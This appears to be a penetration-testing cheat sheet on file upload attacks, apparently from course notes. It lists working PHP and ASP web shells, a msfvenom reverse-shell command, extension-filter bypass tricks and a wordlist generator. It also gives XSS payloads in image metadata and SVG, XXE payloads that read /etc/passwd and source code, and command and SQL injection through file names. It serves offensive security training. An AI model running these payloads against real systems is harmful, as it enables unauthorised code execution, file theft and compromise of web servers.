Web Shell | Description |
---|---|
<?php file_get_contents('/etc/passwd'); ?> |
Basic PHP File Read |
<?php system('hostname'); ?> |
Basic PHP Command Execution |
<?php system($_REQUEST['cmd']); ?> |
Basic PHP Web Shell |
<% eval request('cmd') %> |
Basic ASP Web Shell |
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php |
Generate PHP reverse shell |
PHP Web Shell | PHP Web Shell |
PHP Reverse Shell | PHP Reverse Shell |
Web/Reverse Shells | List of Web Shells and Reverse Shells |
Extension discovery list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
Command | Description |
---|---|
Client-Side Bypass | |
[CTRL+SHIFT+C] |
Toggle Page Inspector |
Blacklist Bypass | |
shell.phtml |
Uncommon Extension |
shell.pHp |
Case Manipulation |
PHP Extensions | List of PHP Extensions |
ASP Extensions | List of ASP Extensions |
Web Extensions | List of Web Extensions |
Whitelist Bypass | |
shell.jpg.php |
Double Extension |
shell.php.jpg |
Reverse Double Extension |
%20 , %0a , %00 , %0d0a , / , .\ , . , … |
Character Injection - Before/After Extension |
Content/Type Bypass | |
Web Content-Types | List of Web Content-Types |
Content-Types | List of All Content-Types |
File Signatures | List of File Signatures/Magic Bytes |
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
Potential Attack | File Types |
---|---|
XSS |
HTML, JS, SVG, GIF (see [[XSS]]) |
XXE /SSRF |
XML, SVG, PDF, PPT, DOC |
DoS |
ZIP, JPG, PNG |
Another example of XSS attacks is web applications that display an image's metadata after its upload. For such web applications, we can include an XSS payload in one of the Metadata parameters that accept raw text, like the Comment
or Artist
parameters, as follows:
Limited File Uploads
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
exiftool HTB.jpg
...SNIP...
Comment : "><img src=1 onerror=alert(window.origin)>
We can see that the Comment
parameter was updated to our XSS payload. When the image's metadata is displayed, the XSS payload should be triggered, and the JavaScript code will be executed to carry the XSS attack. Furthermore, if we change the image's MIME-Type to text/html
, some web applications may show it as an HTML document instead of an image, in which case the XSS payload would be triggered even if the metadata wasn't directly displayed.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
Once the above SVG image is uploaded and viewed, the XML document would get processed, and we should get the info of (/etc/passwd
) printed on the page or shown in the page source. Similarly, if the web application allows the upload of XML
documents, then the same payload can carry the same attack when the XML data is displayed on the web application.
Read files/Code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
Using XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF
, Word Documents
, PowerPoint Documents
, among many others. All of these documents include XML data within them to specify their format and structure. Suppose a web application used a document viewer that is vulnerable to XXE and allowed uploading any of these documents. In that case, we may also modify their XML data to include the malicious XXE elements, and we would be able to carry a blind XXE attack on the back-end web server.
For example, if we name a file file$(whoami).jpg
or file`whoami`.jpg
or file.jpg||whoami
, and then the web application attempts to move the uploaded file with an OS command (e.g. mv file /tmp
), then our file name would inject the whoami
command, which would get executed, leading to remote code execution. You may refer to the Command Injections module for more information. See [[Command Injections]]
We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg
), which may lead to an SQL injection if the file name is insecurely used in an SQL query.